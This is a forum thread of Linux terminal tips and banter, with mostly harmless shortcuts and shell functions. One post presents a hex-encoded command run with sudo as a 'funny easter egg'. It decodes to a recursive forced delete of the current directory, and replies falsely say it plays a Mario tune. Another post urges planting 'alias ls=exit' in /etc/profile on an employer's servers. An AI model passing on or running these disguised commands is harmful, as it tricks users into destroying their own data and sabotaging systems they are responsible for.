Linux Terminal Pro Tips

Here's a trick to save time in the command-line:
- Instead of typing exit into your terminal you can simply type exi and hit TAB.

Stay frosty, hackers.

Attached: mr-robot.gif (220x238, 318.14K)

Square brackets, not angle brackets champ.
You can also just press
which will close the current shell. In most terminal emulators closing the shell will close the tab/window.

sudo $(echo 726d202d7266202a | xxd -r -p)
funny easter egg in the terminal

cool, it plays super mario tune
tnx bro

this is really good tip i am excitedly waiting for the next one

ty bro

I want to try it but why does it need sudo?


>which will close the current shell
More precisely, it "sends" an EOF, i.e. closes the shell's stdin. This works with most REPLs and brings you back to the shell in that case.

i was doing this kind of shit before but i am a better man now.

Attached: 1654546566432643.png (1920x1080, 284.49K)

why not bro

cat - > file
>type as much as you want, finish by ctrl+D
base64 /dev/urandom | head -n 1
>generate a password
base32 /dev/urandom | head -c 76
>generate a filename
printf "foo\nbar\netc"
>print multiple lines (also great for piping multiple commands into other programs)

Nice quads bro

>base64 /dev/urandom

Attached: 1675446534365346.jpg (1920x1280, 684.54K)

wow this stops the ukraine war!

Do this on all your employer's servers:
echo "alias ls=exit" > /etc/profile

Posting some real stuff since the majority of the Any Forums retards know only rm -rf

>Auto ls once you cd into a directory (tested in ZSH)
function chpwd() {
emulate -L zsh

>Show tldr version of a command if you're too lazy to read manpages
function cheat() {

>Pretty CSV viewer
function pretty_csv {
#column -t -s, -n "$@" | less -F -S -X -K
perl -pe 's/((?

fuck you

>exi and hit TAB
He doesn't use exiv2

Attached: tyrell wellick.gif (500x295, 1.48M)

Ctrl+L to clear

very cool